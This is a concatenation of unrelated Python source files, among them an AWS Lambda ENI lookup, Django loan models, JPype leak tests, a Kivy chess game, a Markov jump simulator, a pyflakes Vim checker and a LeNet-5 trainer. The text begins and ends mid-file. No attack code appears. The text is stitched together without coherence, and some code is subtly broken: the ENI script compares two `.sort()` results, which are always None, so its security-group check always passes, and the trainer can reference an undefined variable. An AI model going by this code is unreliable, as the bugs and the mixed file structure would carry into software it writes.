vão até 12!\n') elif ano < 0: # se o ano for negativo... print(f'\n-=-=-=-=-=-=-=-=-=-\n{dia} de {mes} de {ano * -1} a.C\n=-=-=-=-=-=-=-=-=-\n') else: # se nenhuma das condições acima for atendida ... print(f'\n-=-=-=-=-=-=-=-=-=-\n{dia} de {mes} de {ano}\n=-=-=-=-=-=-=-=-=-\n') mesPorExtenso() import json import boto3 REGION_NAME = 'us-west-2' ENI_ID = 'eni-XXXXXXXXXXXXXXXXX' EC2_CLIENT = boto3.client('ec2', region_name=REGION_NAME) LAMBDA_CLIENT = boto3.client('lambda', region_name=REGION_NAME) PAGINATOR = LAMBDA_CLIENT.get_paginator('list_functions') # Make sure ALL versions are returned OPERATION_PARAMETERS = {'FunctionVersion': 'ALL'} # Create an empty set to dump all the individual function's data ALL_FUNCTIONS = set() def find_eni(eni_id): """Find ENI metadata""" response = EC2_CLIENT.describe_network_interfaces( Filters=[ { 'Name': 'network-interface-id', 'Values': [eni_id] } ] ) return response def find_functions(eni_response): """ Find all functions using that ENI """ # Functions should be using the exact SGs as that of ENI # ENI's subnet must be a part of Lambda's subnet group # SDK calls are paginated, they can be unpacked with paginators page_iterator = PAGINATOR.paginate(**OPERATION_PARAMETERS) for page in page_iterator: functions = page['Functions'] for function in functions: try: # is this function in VPC? if function['VpcConfig']['VpcId']: # Does the SG match? if len(function['VpcConfig']['SecurityGroupIds']) == len(eni_response['Groups']): # Sort and check if they match eni_security_groups = [i['GroupId'] for i in eni_response['Groups']] if eni_security_groups.sort() == function['VpcConfig']['SecurityGroupIds'].sort(): # is Lambda's subnet a part of ENI's subnet? 
if eni_response['SubnetId'] in function['VpcConfig']['SubnetIds']: funct = json.dumps(function) ALL_FUNCTIONS.add(funct) except Exception as e: pass def format_function(all_functions, eni_response): """Format function data""" print(f"Lambda function(s) using ENI: {eni_response['NetworkInterfaceId']}:\n") for function in all_functions: function_data = json.loads(function) print(function_data['FunctionArn']) print("") def lambda_handler(event, context): """Main function""" eni_response = find_eni(ENI_ID) eni_response = eni_response['NetworkInterfaces'] # ENI exists? if eni_response: eni_response = eni_response[0] # Find and format function associated to this ENI find_functions(eni_response) format_function(ALL_FUNCTIONS, eni_response) else: return { 'statusCode': 200, 'body': f"ENI: {ENI_ID} not found in {REGION_NAME}" } return { 'statusCode': 200, 'body': "See function logs" } import urllib.request import io from general import * def get_robots_txt(url): if url.endswith("/"): path = url else: path = url + "/" pp=path + "robots.txt" try: req = urllib.request.urlopen(pp, data =None) data = io.TextIOWrapper(req, encoding="utf-8") except Exception as ex: print("Robots.txt file doesn't exist") return 0 else: return data.read() <reponame>kevintsq/GetSubprocessCPUTimeSpawnedByParentProcess<filename>GetProcessCPUTimeUsingWin32API.py import win32api import win32process import win32con import win32event import time # Reference: https://www.programcreek.com/python/example/8489/win32process.CreateProcess # Reference: https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa StartupInfo = win32process.STARTUPINFO() StartupInfo.dwFlags = win32process.STARTF_USESHOWWINDOW StartupInfo.wShowWindow = win32con.SW_NORMAL StartupInfo.hStdInput = win32api.GetStdHandle(win32api.STD_INPUT_HANDLE) StartupInfo.hStdOutput = win32api.GetStdHandle(win32api.STD_OUTPUT_HANDLE) StartupInfo.hStdError = win32api.GetStdHandle(win32api.STD_ERROR_HANDLE) command = r"java -jar Test.jar" startTime = time.time() TIMEOUT = 1.5 # create subprocess using win32api hProcess, hThread, dwProcessId, dwThreadId = win32process.CreateProcess( None, command, None, None, 0, win32process.NORMAL_PRIORITY_CLASS, None, None, StartupInfo) # waiting for subprocess to exit win32event.WaitForSingleObject(hProcess, int(TIMEOUT * 1000)) win32api.TerminateProcess(hProcess, 0) win32event.WaitForSingleObject(hProcess, win32event.INFINITE) # query cpu time using win32api sTime = win32process.GetProcessTimes(hProcess) # print(sTime) print(f"cputime: {(sTime['KernelTime'] + sTime['UserTime']) / 10000000}") print(f"realtime: {(sTime['ExitTime'] - sTime['CreationTime']).total_seconds()}") <filename>backend/api/models.py from django.db import models # Create your models here. 
class Member(models.Model): account_number=models.CharField(max_length=100,null=True, blank=True,unique=True) fname=models.CharField(max_length=100) mname=models.CharField(max_length=100,null=True,blank=True) lname=models.CharField(max_length=100) age=models.IntegerField(default=0,null=True,blank=True) gender=models.CharField(max_length=30) occupation=models.CharField(max_length=300,null=True,blank=True) civil_status=models.CharField(max_length=50) partner_name=models.CharField(max_length=200,null=True,blank=True) address=models.CharField(max_length=200) mobile_number=models.CharField(max_length=14) monthly_income=models.BigIntegerField(default=0) def __str__(self): return self.fname +' '+self.lname class ClusterName(models.Model): name=models.CharField(max_length=200) class Loan(models.Model): loan_cycle= models.IntegerField(default=1) loan_type=models.IntegerField(default=1) loan_mode=models.IntegerField(default=1) member=models.ForeignKey(Member,on_delete=models.PROTECT,related_name="loanapplications") clustername=models.ForeignKey(ClusterName,on_delete=models.PROTECT,related_name="loanapplications") principal=models.DecimalField(max_digits=40,decimal_places=2) interest_rate=models.DecimalField(max_digits=40,decimal_places=2) interest=models.DecimalField(max_digits=40,decimal_places=2) processing_fee=models.DecimalField(max_digits=40,decimal_places=2,null=True,blank=True) loan_period=models.FloatField(default=0.0) payment_period=models.IntegerField(default=1) loan_witness=models.CharField(max_length=200,null=True,blank=True) cbu=models.DecimalField(max_digits=20,decimal_places=2,null=True,blank=True) date_release=models.DateField(null=True, blank=True) class LoanPayment(models.Model): loan=models.ForeignKey(Loan,on_delete=models.PROTECT,related_name="loanpayments") date_of_payment = models.DateField() beginning_balance = models.DecimalField(max_digits=40,decimal_places=2) paid_interest = models.DecimalField(max_digits=40,decimal_places=2) paid_principal = models.DecimalField(max_digits=40,decimal_places=2) ending_balance = models.DecimalField(max_digits=40,decimal_places=2) class File(models.Model): file = models.FileField(upload_to='file/') class LoanSchedulePayments(models.Model): loan=models.ForeignKey(Loan,on_delete=models.CASCADE,null=True,related_name="loanscheds") date=models.DateField() principal=models.DecimalField(max_digits=40,decimal_places=2) interest=models.DecimalField(max_digits=40,decimal_places=2) """ Examples of code for recalibration. 
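The script below builds synthetic heteroscedastic predictions, then compares calibration metrics (MACE, RMSCE, miscalibration area) and calibration plots before and after recalibration with iso_recal.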
""" import numpy as np import matplotlib.pyplot as plt from matplotlib import rc import uncertainty_toolbox.data as udata import uncertainty_toolbox.metrics as umetrics from uncertainty_toolbox.metrics_calibration import ( get_proportion_lists_vectorized, ) import uncertainty_toolbox.viz as uviz from uncertainty_toolbox.recalibration import iso_recal import neatplot neatplot.set_style() neatplot.update_rc("text.usetex", False) # Set random seed np.random.seed(11) # Generate synthetic predictive uncertainty results n_obs = 650 f, std, y, x = udata.synthetic_sine_heteroscedastic(n_obs) # Save figure (set to True to save) savefig = False def save_figure(name_str, file_type="png"): """Save figure, or do nothing if savefig is False.""" if savefig: neatplot.save_figure(name_str, file_type) def update_rc_params(): """Update matplotlib rc params.""" plt.rcParams.update({"font.size": 14}) plt.rcParams.update({"xtick.labelsize": 14}) plt.rcParams.update({"ytick.labelsize": 14}) # List of predictive means and standard deviations pred_mean_list = [f] pred_std_list = [ std * 0.5, # overconfident std * 2.0, # underconfident ] # Loop through, make plots, and compute metrics for i, pred_mean in enumerate(pred_mean_list): for j, pred_std in enumerate(pred_std_list): # Before recalibration exp_props, obs_props = get_proportion_lists_vectorized(pred_mean, pred_std, y) recal_model = None mace = umetrics.mean_absolute_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) rmsce = umetrics.root_mean_squared_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) ma = umetrics.miscalibration_area( pred_mean, pred_std, y, recal_model=recal_model ) print("Before Recalibration") print(" MACE: {:.5f}, RMSCE: {:.5f}, MA: {:.5f}".format(mace, rmsce, ma)) uviz.plot_calibration( pred_mean, pred_std, y, exp_props=exp_props, obs_props=obs_props, show=True, ) # After recalibration recal_model = iso_recal(exp_props, obs_props) recal_exp_props, recal_obs_props = get_proportion_lists_vectorized( pred_mean, pred_std, y, recal_model=recal_model ) mace = umetrics.mean_absolute_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) rmsce = umetrics.root_mean_squared_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) ma = umetrics.miscalibration_area( pred_mean, pred_std, y, recal_model=recal_model ) print(" After Recalibration") print(" MACE: {:.5f}, RMSCE: {:.5f}, MA: {:.5f}".format(mace, rmsce, ma)) uviz.plot_calibration( pred_mean, pred_std, y, exp_props=recal_exp_props, obs_props=recal_obs_props, show=True, ) # Generated by Django 3.0.3 on 2020-04-03 18:31 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0009_auto_20200324_1254'), ] operations = [ migrations.AddField( model_name='post', name='can_comment', field=models.BooleanField(default=False), ), migrations.AddField( model_name='post', name='post_type', field=models.CharField(choices=[('index', 'index'), ('useful', 'useful'), ('news', 'news')], default='news', max_length=25), ), ] <gh_stars>1000+ """ A collection of extra features in gryphon-exec. 
""" <gh_stars>0 import _jpype import jpype from jpype.types import * import sys import logging import time import common class Tracer(object): ctor = 0 dtor = 0 def __init__(self): Tracer.ctor += 1 def __del__(self): Tracer.dtor += 1 @staticmethod def reset(): Tracer.ctor = 0 Tracer.dtor = 0 @staticmethod def leaked(): return Tracer.ctor - Tracer.dtor @staticmethod def attach(obj): object.__setattr__(obj, "_trace", Tracer()) # This test finds reference counting leak by attaching an # object that lives as long as the wrapper is alive. # It can't detect Java reference counter leaks. class Leak2TestCase(common.JPypeTestCase): def setUp(self): common.JPypeTestCase.setUp(self) self.fixture = JClass('jpype.common.Fixture')() Tracer.reset() def testArrayCall(self): JA = JArray(JInt) def call(): inst = JA(100) Tracer.attach(inst) self.fixture.callObject(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testArrayMemoryView(self): JA = JArray(JInt) def call(): inst = JA(100) Tracer.attach(inst) memoryview(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testBufferCall(self): byte_buffer = jpype.JClass('java.nio.ByteBuffer') def call(): inst = byte_buffer.allocateDirect(10) Tracer.attach(inst) self.fixture.callObject(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testBufferMemoryView(self): byte_buffer = jpype.JClass('java.nio.ByteBuffer') def call(): inst = byte_buffer.allocateDirect(10) Tracer.attach(inst) memoryview(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) <filename>tests/http/operators/test_http.py<gh_stars>10-100 from unittest import mock import pytest from airflow.exceptions import TaskDeferred from astronomer.providers.http.sensors.http import HttpSensorAsync from astronomer.providers.http.triggers.http import HttpTrigger def test_http_run_now_operator_async(): """ Asserts that a task is deferred and a HttpTrigger will be fired when the HttpSensorAsync is executed. """ operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", ) with pytest.raises(TaskDeferred) as exc: operator.execute({}) assert isinstance(exc.value.trigger, HttpTrigger), "Trigger is not a HttpTrigger" def test_http_response_check_does_not_run_async(): """ Asserts that a task is not deferred when response_check arg is passed to HttpSensorAsync. """ operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", response_check=lambda response: "httpbin" in response.text, ) with mock.patch("astronomer.providers.http.sensors.http.HttpSensorAsync.defer") as mock_defer, mock.patch( "airflow.sensors.base.BaseSensorOperator.execute" ): operator.execute({}) mock_defer.assert_not_called() operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", ) with mock.patch("astronomer.providers.http.sensors.http.HttpSensorAsync.defer") as mock_defer: operator.execute({}) mock_defer.assert_called_once_with(timeout=None, trigger=mock.ANY, method_name="execute_complete") <reponame>cristaloleg/wallaroo<gh_stars>0 # Copyright 2017 The Wallaroo Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. 
See the License for the specific language governing # permissions and limitations under the License. """ """ from .cluster import (add_runner, Cluster, ClusterError, Runner, RunnerData, runner_data_format, start_runners) from .control import (SinkAwaitValue, SinkExpect, TryUntilTimeout, WaitForClusterToResumeProcessing) from .end_points import (Metrics, MultiSequenceGenerator, Reader, Sender, Sink, files_generator, framed_file_generator, iter_generator, newline_file_generator, sequence_generator) from .errors import (AutoscaleError, CrashedWorkerError, DuplicateKeyError, ExpectationError, MigrationError, PipelineTestError, StopError, TimeoutError) from .external import (clean_resilience_path, create_resilience_dir, run_shell_cmd, get_port_values, is_address_available, setup_resilience_path) from .integration import pipeline_test from .logger import (DEFAULT_LOG_FMT, INFO2, set_logging) from .metrics_parser import (MetricsData, MetricsParser, MetricsParseError) from .observability import (cluster_status_query, get_func_name, multi_states_query, ObservabilityNotifier, ObservabilityResponseError, ObservabilityTimeoutError, partition_counts_query, partitions_query, state_entity_query) from .stoppable_thread import StoppableThread from .typed_list import TypedList <reponame>TOSUKUi/ReadyForApi<filename>readyforapi/user.py # make this until 2017/5/30 from . import * from .core import ReadyForObject, ReadyForConnection from cached_property import cached_property from .errors import UserNoIDException class User(ReadyForObject): def __init__(self, user_id=None, user_url=None, backed_at=None, name=None): if user_id is None and user_url is None: raise ValueError('no one of argument which must be supplied') elif user_id is not None: self.__id = user_id self.user_url = None elif user_url is not None: self.user_url = user_url self.__id = None # This property activate when this user is gotten from comment page of project. self.backed_at = backed_at self.setted_name = name @cached_property def from_user_page(self): user_identifier = "" if self.__id == "NoID": raise UserNoIDException("User id が NoID のときはUserページの情報を取りに行かないで下さい") if self.__id is not None: user_identifier = self.__id elif self.user_url is not None: user_identifier = self.user_url.split("/")[4] response = ReadyForConnection.call(objects_kind="users", object_id=user_identifier, param=None, method="GET") return html_parser.UserPageParser(response.text).parse() @cached_property def _id(self): if self.__id is not None: return self.__id elif self.user_url is not None: return self.user_url.split("/")[4] @property def name(self): if self.setted_name is not None: return self.setted_name else: return self.from_user_page["name"] @property def url(self): if self.user_url is not None: return self.user_url else: return "{domain}/{users}/{id}".format( domain="https://readyfor.jp", users="users", id=self.id ) @property def biography(self): return self.from_user_page["biography"] @property def sns_links(self): return self.from_user_page["sns_links"] print("HIIIIIIOOO") import importlib from .base_model import BaseModel print("HIIIIIIOOO") def find_model_using_name(model_name): # Given the option --model [modelname], # the file "models/modelname_model.py" # will be imported. # task_module = importlib.import_module(task_name) # model_filename = task_name + ".models." + model_name.lower() + "_model" model_filename = "models." 
+ model_name.lower() + "_model" # modellib = importlib.import_module(model_filename, package=task_module) modellib = importlib.import_module(model_filename) # In the file, the class called ModelNameModel() will # be instantiated. It has to be a subclass of BaseModel, # and it is case-insensitive. model = None target_model_name = model_name.replace('_', '') + 'model' for name, cls in modellib.__dict__.items(): if name.lower() == target_model_name.lower() \ and next(iter(cls.__bases__)).__module__.endswith(BaseModel.__module__): # check that base class is BaseModel model = cls if model is None: raise NotImplementedError("In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase." % (model_filename, target_model_name)) return model def get_option_setter(model_name): model_class = find_model_using_name(model_name) return model_class.modify_commandline_options def create_model(opt): instance = create_model_by_name(opt.model, opt) return instance def create_model_by_name(name, opt): model = find_model_using_name(name) instance = model(opt) print("model [%s] was created" % (instance.name())) return instance <gh_stars>1-10 ''' A networked real-time strategy game based on Chess ''' from kivy.app import App from kivy.clock import Clock, mainthread from kivy.config import Config from kivy.core.window import Window from kivy.uix.boxlayout import BoxLayout from kivy.uix.textinput import TextInput import env from board_view import BoardView from game_model import GameModel from net_engine import NetEngine from widgets import WrappedLabel, WrappedButton num_msg_lines = 3 if env.is_mobile else 8 class Game(BoxLayout): game_title = 'Chess Chase: No turns, no sight!' def __init__(self, **kwargs): super(Game, self).__init__(**kwargs) self.game_model = GameModel() self.game_model.king_captured = self.king_captured self.game_model.on_message.append(self.update_label) self.net_engine = NetEngine(self.game_model) self.score = [0, 0] self.board_view = BoardView(self.game_model) self.add_widget(self.board_view) self.game_model.on_init.append(self.board_view.reset) self.game_model.on_init.append(self.on_game_init) self.info_pane = BoxLayout(orientation='vertical', size_hint_min_y=500) self.add_widget(self.info_pane) row_args = {'size_hint': (1, 0), 'size_hint_min_y': 70} if not env.is_mobile: self.info_pane.add_widget(WrappedLabel(halign='center', text=self.game_title, **row_args)) self.button_pane = BoxLayout(orientation='vertical', size_hint=(1, .4)) self.info_pane.add_widget(self.button_pane) self.button_pane.add_widget(WrappedButton( halign='center', text='Tutorial: How to play', on_press=self.start_tutorial)) self.button_pane.add_widget(WrappedButton( halign='center', text='Start Game' if env.is_mobile else 'Start Game: Play with friends', on_press=self.start_game)) self.score_label = WrappedLabel( halign='center', **row_args) self.info_pane.add_widget(self.score_label) self.label = WrappedLabel(halign='center', valign='bottom') self.info_pane.add_widget(self.label) self.text_input = TextInput( multiline=False, text_validate_unfocus=env.is_mobile, **row_args) self.text_input.bind(on_text_validate=self.handle_text_input) if env.is_mobile: self.text_input.keyboard_mode = 'managed' def on_focus(*args): if self.text_input.focus: self.text_input.show_keyboard() else: def on_focus(*args): if not self.text_input.focus: # Steal focus self.text_input.focus = True self.text_input.bind(focus=on_focus) self.info_pane.add_widget(self.text_input) self.game_model.add_message('') 
self.game_model.add_message(self.game_title if env.is_mobile else 'Welcome to Chess Chase!') self.bind(size=self.resized) Clock.schedule_interval(self.on_clock, 1/30) @mainthread def on_game_init(self): if env.is_mobile and self.game_model.mode == 'play': self.text_input.hide_keyboard() def stop_net_engine(self): if not self.net_engine: return self.net_engine.should_stop = True def restart_net_engine(self): self.stop_net_engine() self.net_engine = NetEngine(self.game_model) def start_game(self, _): self.text_input.focus = True if env.is_mobile: self.text_input.show_keyboard() self.game_model.mode = 'connect' self.score = [0, 0] self.restart_net_engine() self.game_model.messages.clear() self.game_model.add_message('Establishing server connection...') self.game_model.init() self.net_engine.start() def start_tutorial(self, i): if env.is_mobile: self.text_input.hide_keyboard() self.game_model.mode = 'tutorial' self.game_model.reset() self.restart_net_engine() self.game_model.messages.clear() self.game_model.add_message('Move the chess pieces and see what happens!') self.game_model.tutorial_messages = [ 'Keep moving the pieces at your own pace.', 'Each piece has its own color, and the board is painted to show where it can move.', 'You only see where your pieces can move', 'You will also see any piece that threatens the king.', 'Note that unlike classic chess, the king can move to a threatened position!', 'There are no turns!', 'There are cool-downs (rate limits) instead.', 'You win the game by capturing the opponent king', 'The game is played with friends over the internet.', 'To start a game both you and your friend need to click "Start Game".', 'Then either you or the friend should type the game identifier that the other was given.', 'This concludes our tutorial!', ] self.game_model.init() self.game_model.players[self.game_model.my_id] = 0 self.net_engine.iter_actions = {} def update_label(self): self.score_label.text = 'White: %d Black: %d' % tuple(self.score) self.label.text = '\n'.join(self.game_model.messages[-num_msg_lines:]) def resized(self, *args): self.orientation = 'horizontal' if self.size[0] > self.size[1] else 'vertical' p = 1/3 if self.orientation == 'horizontal': self.info_pane.size_hint = (p, 1) self.board_view.size_hint = (self.game_model.num_boards, 1) self.button_pane.orientation = 'vertical' self.button_pane.size_hint = (1, .4) self.button_pane.size_hint_min_y = 140 else: self.info_pane.size_hint = (1, p) self.board_view.size_hint = (1, 1 / self.game_model.num_boards) self.button_pane.orientation = 'horizontal' self.button_pane.size_hint = (1, .4) self.button_pane.size_hint_min_y = 70 def handle_text_input(self, entry): if env.is_mobile: self.text_input.hide_keyboard() command = entry.text entry.text = '' if not command: return if command[:1] == '/': if command == '/help': self.game_model.help() return self.game_model.add_action(*command[1:].split()) return if self.game_model.mode in [None, 'connect']: self.net_engine.connect(command) return # Chat self.game_model.add_action('msg', command) def king_captured(self, who): if self.game_model.mode == 'replay': return winner = 1 - who%2 self.score[winner] += 1 self.game_model.add_message('') self.game_model.add_message('%s King Captured!' % self.game_model.player_str(who)) self.game_model.add_message('%s wins!' 
% self.game_model.player_str(winner)) self.net_engine.start_replay() def on_clock(self, _interval): self.net_engine.iteration() self.board_view.update_dst() self.board_view.show_board() class ChessChaseApp(App): def build(self): self.game = Game() if not env.is_mobile: self.game.text_input.focus = True return self.game def stop(self): self.game.stop_net_engine() if __name__ == '__main__': Config.set('input', 'mouse', 'mouse,multitouch_on_demand') Window.softinput_mode = 'pan' ChessChaseApp().run() <filename>pages/create_tasknotes_page.py<gh_stars>0 from pages.create_task_page import CreateTaskPage from utils.locators import * from pages.base_page import BasePage class CreateTaskNotesPage(BasePage): def __init__(self, driver): self.locator = CreateTaskNotesLocators super(CreateTaskNotesPage, self).__init__(driver) def enter_notes_name(self, notes): self.find_element(*self.locator.enter_notes_input).clear() self.find_element(*self.locator.enter_notes_input).send_keys(notes) def click_next_week_button(self): self.wait_element(*self.locator.next_week_button) self.find_element(*self.locator.next_week_button).click() def click_personal_option_button(self): self.wait_element(*self.locator.personal_option_button) self.find_element(*self.locator.personal_option_button).click() <filename>simulators/markov_jump_processes.py<gh_stars>10-100 from __future__ import division import numpy as np import util.math class SimTooLongException(Exception): """ Exception to be thrown when a simulation runs for too long. """ def __init__(self, max_n_steps): self.max_n_steps = max_n_steps def __str__(self): return 'Simulation exceeded the maximum of {} steps.'.format(self.max_n_steps) class MarkovJumpProcess: """ Implements a generic Markov Jump Process. It's an abstract class and must be implemented by a subclass. """ def __init__(self, init, params): """ :param init: initial state :param params: parameters """ self.state = None self.params = None self.time = None self.reset(init, params) def reset(self, init, params): """ Resets the simulator. :param init: initial state :param params: parameters """ self.state = np.asarray(init, dtype=float) self.params = np.asarray(params, dtype=float) self.time = 0.0 def _calc_propensities(self): raise NotImplementedError('This is an abstract method and should be implemented in a subclass.') def _do_reaction(self, reaction): raise NotImplementedError('This is an abstract method and should be implemented in a subclass.') def sim_steps(self, num_steps, include_init_state=True, rng=np.random): """ Runs the simulator for a given number of steps. :param num_steps: number of steps :param include_init_state: if True, include the initial state in the output :param rng: random number generator to use :return: times, states """ times = [self.time] states = [self.state.copy()] for _ in xrange(num_steps): rates = self.params * self._calc_propensities() total_rate = rates.sum() if total_rate == 0: self.time = float('inf') break self.time += rng.exponential(scale=1./total_rate) reaction = util.math.discrete_sample(rates / total_rate, rng=rng) self._do_reaction(reaction) times.append(self.time) states.append(self.state.copy()) if not include_init_state: times, states = times[1:], states[1:] return np.array(times), np.array(states) def sim_time(self, dt, duration, include_init_state=True, max_n_steps=float('inf'), rng=np.random): """ Runs the simulator for a given amount of time. 
:param dt: time step :param duration: total amount of time :param include_init_state: if True, include the initial state in the output :param max_n_steps: maximum number of simulator steps allowed. If exceeded, an exception is thrown. :param rng: random number generator to use :return: states """ num_rec = int(duration / dt) + 1 states = np.empty([num_rec, self.state.size], float) cur_time = self.time n_steps = 0 for i in xrange(num_rec): while cur_time > self.time: rates = self.params * self._calc_propensities() total_rate = rates.sum() if total_rate == 0: self.time = float('inf') break self.time += rng.exponential(scale=1./total_rate) reaction = util.math.discrete_sample(rates / total_rate, rng=rng) self._do_reaction(reaction) n_steps += 1 if n_steps > max_n_steps: raise SimTooLongException(max_n_steps) states[i] = self.state.copy() cur_time += dt return states if include_init_state else states[1:] class LotkaVolterra(MarkovJumpProcess): """ The Lotka-Volterra implementation of the Markov Jump Process. """ def _calc_propensities(self): x, y = self.state xy = x * y return np.array([xy, x, y, xy]) def _do_reaction(self, reaction): if reaction == 0: self.state[0] += 1 elif reaction == 1: self.state[0] -= 1 elif reaction == 2: self.state[1] += 1 elif reaction == 3: self.state[1] -= 1 else: raise ValueError('Unknown reaction.') <reponame>leewckk/vim.configuration """ Code for running pyflakes checks in Vim buffer The main function is ``check``, which runs the pyflakes check on a buffer. """ import sys import ast from operator import attrgetter import re from pyflakes import checker, messages try: # Vim module available within vim import vim except ImportError: # Otherwise, mock it up for tests from mock import Mock vim = Mock() class loc(object): def __init__(self, lineno, col=None): self.lineno = lineno self.col_offset = col class SyntaxError(messages.Message): message = 'could not compile: %s' def __init__(self, filename, lineno, col, message): messages.Message.__init__(self, filename, loc(lineno, col)) self.message_args = (message,) self.lineno = lineno class blackhole(object): write = flush = lambda *a, **k: None def check(buffer): filename = buffer.name contents = buffer[:] # shebang usually found at the top of the file, followed by source code encoding marker. # assume everything else that follows is encoded in the encoding. 
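    # Added note (not in the original source): per PEP 263 an encoding
    # declaration is only honoured on the first or second line, so the loop
    # below stops checking after two lines; when a coding marker is found,
    # the lines up to and including it are replaced with blanks so that the
    # reported line numbers still match the buffer.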
for n, line in enumerate(contents): if n >= 2: break elif re.match(r'#.*coding[:=]\s*([-\w.]+)', line): contents = ['']*(n+1) + contents[n+1:] break contents = '\n'.join(contents) + '\n' vimenc = vim.eval('&encoding') if vimenc and hasattr(contents, 'decode'): contents = contents.decode(vimenc) builtins = set(['__file__']) try: builtins.update(set(eval(vim.eval('string(g:pyflakes_builtins)')))) except Exception: pass try: # TODO: use warnings filters instead of ignoring stderr old_stderr, sys.stderr = sys.stderr, blackhole() try: tree = ast.parse(contents, filename or '<unknown>') finally: sys.stderr = old_stderr except: exc_value = sys.exc_info()[1] try: lineno, offset, line = exc_value.args[1][1:] except IndexError: lineno, offset, line = 1, 0, '' if line and line.endswith("\n"): line = line[:-1] return [SyntaxError(filename, lineno, offset, str(exc_value))] else: # pyflakes looks to _MAGIC_GLOBALS in checker.py to see which # UndefinedNames to ignore old_globals = getattr(checker,' _MAGIC_GLOBALS', []) checker._MAGIC_GLOBALS = set(old_globals) | builtins filename = '(none)' if filename is None else filename w = checker.Checker(tree, filename) checker._MAGIC_GLOBALS = old_globals w.messages.sort(key = attrgetter('lineno')) return w.messages def vim_quote(s): return s.replace("'", "''") <gh_stars>10-100 from icevision.metrics.jaccard_index.binary_jaccard_index import * <filename>main-lenet5.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- # @Date : May-18-20 # @Update : Sep-09-20 # @Author : <NAME> (<EMAIL>) # @RefLink : https://github.com/KellyHwong/kaggle_digit_recognizer # @RefLink : https://www.kaggle.com/c/digit-recognizer import os import datetime import pandas as pd import numpy as np import torch from torch import nn, optim from torch.autograd import Variable import torch.nn.functional as F from torchvision import datasets, transforms from sklearn.utils import shuffle from torch_fn.model import LeNet5 from torch_fn.data_loader import load_data from utils.dir_utils import makedir_exist_ok def main(): # paths competition_name = "digit-recognizer" data_dir = os.path.expanduser(f"~/.kaggle/competitions/{competition_name}") ckpt_dir = os.path.expanduser( f"~/Documents/DeepLearningData/{competition_name}/ckpts") log_dir = os.path.expanduser( f"~/Documents/DeepLearningData/{competition_name}/logs") makedir_exist_ok(ckpt_dir) makedir_exist_ok(log_dir) # experiment time date_time = datetime.datetime.now().strftime("%Y%m%d-%H%M%S") # load data train_images, train_labels, test_images = load_data( data_dir) # train_images: N, H, W num_train = train_images.shape[0] num_test = test_images.shape[0] # TODO data_transforms = { 'train': transforms.Compose([ transforms.ToTensor() ]), 'val': transforms.Compose([ transforms.ToTensor() ]), } # training parameters IF_FAST_RUN = True start_epoch = 0 # epochs = input("input training epochs: ") # user epochs epochs = 1 if IF_FAST_RUN else epochs # fast run epochs batch_size = 32 use_gpu = torch.cuda.is_available() # prepare model, LeNet-5 model_type = "LeNet-5" model = LeNet5() print(f"Using model: {model_type}.") model.train() # training model_ckpt_dir = os.path.join( ckpt_dir, model_type, date_time) # weights save path makedir_exist_ok(model_ckpt_dir) # TODO not implemented # train_loader = torch.utils.data.DataLoader(dataset=data_train, # batch_size=batch_size, # shuffle=True, num_workers=4) # model and model properties model = LeNet5() steps_per_epoch = int(np.ceil(num_train/batch_size)) use_gpu = torch.cuda.is_available() model = model.cuda() if 
use_gpu else model # to GPU model.train() criterion = nn.CrossEntropyLoss(size_average=False) optimizer = torch.optim.Adam( model.parameters(), lr=1e-3, betas=(0.9, 0.99)) for epoch in range(epochs): for step in range(steps_per_epoch): _batch_size = batch_size # tmp batch_size if (step+1) * batch_size >= num_train: _batch_size = num_train - step*batch_size # take left samples batch_idx = np.arange(step*batch_size, step*batch_size+_batch_size) X_batch = train_images[batch_idx] # train_images is N, H, W, C y_batch = train_labels[batch_idx] # to Tensor X_batch, y_batch = torch.from_numpy( X_batch).float(), torch.from_numpy(y_batch).long() X_batch = X_batch.permute(0, 3, 1, 2) # permute it to N, C, H, W if use_gpu: # to GPU X_batch, y_batch = X_batch.cuda(), y_batch.cuda() optimizer.zero_grad() output = model(X_batch) loss = criterion(output, y_batch) loss.backward() optimizer.step() # args.log_interval log_interval = 100 if step % log_interval == 0: trained_samples = step*batch_size + _batch_size print( f"Training Epoch: [{epoch+1}/{epochs}]. Step: [{step+1}/{steps_per_epoch}]. Samples: [{trained_samples}/{num_train} ({trained_samples/num_train*100: .2f} % )]. Loss: {loss: .6f}" ) latest_weights_path = os.path.join( model_ckpt_dir, f"{model_type}-latest-weights.pth") torch.save(model.state_dict(), latest_weights_path) print(f"Model saved to {latest_weights_path}.") if __name__ == "__main__": main() from statistics import median with open("day-10.txt") as f: nav_sys = f.read().rstrip().splitlines() pairs = { ")": "(", "]": "[", "}": "{", ">": "<", } points = { "(": 1, "[": 2, "{": 3, "<": 4, } scores = [] for line in nav_sys: brackets = [] for char in line: if char in pairs: if brackets and pairs[char] == brackets[-1]: brackets.pop() else: break else: brackets.append(char) else: score = 0 for b in reversed(brackets): score = score * 5 + points[b] scores.append(score) print(median(scores)) # Copyright (C) 2010-2011 <NAME> # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT 